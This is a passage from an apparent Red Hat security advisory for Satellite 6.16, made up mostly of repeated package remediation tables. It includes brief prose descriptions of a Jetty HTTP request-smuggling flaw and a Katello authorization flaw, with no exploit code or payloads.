| Unresolved product id: 9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src | — |
Workaround
|
A flaw was found in Eclipse Jetty. The HTTP/1.1 parser is vulnerable to request smuggling when chunk extensions are used. An attacker can inject crafted requests to manipulate and trick the parser. This issue can lead to security controls bypass, cache poisoning or unauthorized endpoint access.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src | — |
Workaround
|
A flaw was found in Katello's of Red Hat Satellite. A content upload functionality where insufficient authorization checks in the ContentUploadsController allowed users with the edit_products permission to query content information for repositories outside the products they were authorized to manage. An authenticated attacker could exploit this issue to determine whether specific content exists within repositories that should otherwise be inaccessible. This issue does not allow unauthorized modification, import, or publication of content.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src | — |
Workaround
|
|
